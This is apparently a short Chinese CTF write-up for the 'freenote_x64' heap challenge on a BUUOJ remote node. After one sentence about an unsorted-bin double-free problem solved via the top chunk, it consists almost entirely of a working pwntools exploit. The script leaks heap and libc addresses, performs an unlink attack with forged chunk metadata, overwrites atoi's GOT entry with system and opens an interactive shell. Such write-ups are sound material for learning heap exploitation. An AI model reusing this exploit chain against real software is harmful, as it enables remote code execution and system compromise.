    unsorted bin你直接进行double free是有问题的刚开始我尝试了很久最后看了别人的博客才发现他们是通过topchunk来搞的。

    1. from pwn import*
    2. from LibcSearcher import*
    3. #context.log_level = 'debug'
    4. #context.arch = 'amd64'
    5. # io =process('./freenote_x64')
    6. io = remote("node4.buuoj.cn",28045)
    7. elf = ELF('./freenote_x64')
    8. libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    9. libc = ELF('libc-2.23.so')
    10. def debug():
    11. gdb.attach(io)
    12. pause()
    13. def creat(length,value):
    14. io.sendlineafter("Your choice: ",'2')
    15. io.sendlineafter("Length of new note: ",str(length))
    16. io.sendafter("Enter your note: ",value)
    17. def edit(id,length,value):
    18. io.sendlineafter("Your choice: ",'3')
    19. io.sendlineafter("Note number: ",str(id))
    20. io.sendlineafter("Length of note: ",str(length))
    21. io.sendafter('Enter your note: ',value)
    22. def show():
    23. io.sendlineafter("Your choice: ",'1')
    24. def free(id):
    25. io.sendlineafter("Your choice: ",'4')
    26. io.sendlineafter("Note number: ",str(id))
    27. creat(0x50,b'a'*0x50)
    28. creat(0x30,b'b'*0x30)
    29. creat(0x50,b'c'*0x50)
    30. creat(0x30,b'd'*0x50)
    31. io.send("\n")
    32. free(0)
    33. free(2)
    34. creat(0x8,b'a'*8)
    35. creat(0x8,b'c'*8)
    36. #show(0)
    37. show()
    38. io.recvuntil("0. aaaaaaaa")
    39. chunk_addr = u64(io.recvuntil("\n")[:-1].ljust(8,"\x00")) -6464+0x30
    40. log.success("chunk_addr--------------->"+hex(chunk_addr))
    41. io.recvuntil("2. cccccccc")
    42. libcbase = u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-3951480
    43. log.success("libcbase----------------------->"+hex(libcbase))
    44. free(1)
    45. free(2)
    46. free(3)
    47. payload = p64(0)+p64(0x81)+p64(chunk_addr-0x18)+p64(chunk_addr-0x10)
    48. payload += b'a'*0x60 + p64(0x80)+p64(0x90)
    49. payload +=b'a'*0x80 + p64(0x90)+p64(0x121)
    50. edit(0,len(payload),payload)
    51. free(1)
    52. #debug()
    53. atoi_got =elf.got["atoi"]
    54. system_addr = libcbase+libc.sym["system"]
    55. payload = p64(0)+p64(1)+p64(8)+p64(atoi_got)
    56. payload +=b'a'*0x100
    57. edit(0,len(payload),payload)
    58. edit(0,len(p64(system_addr)),p64(system_addr))
    59. io.sendline("cat flag")
    60. io.interactive()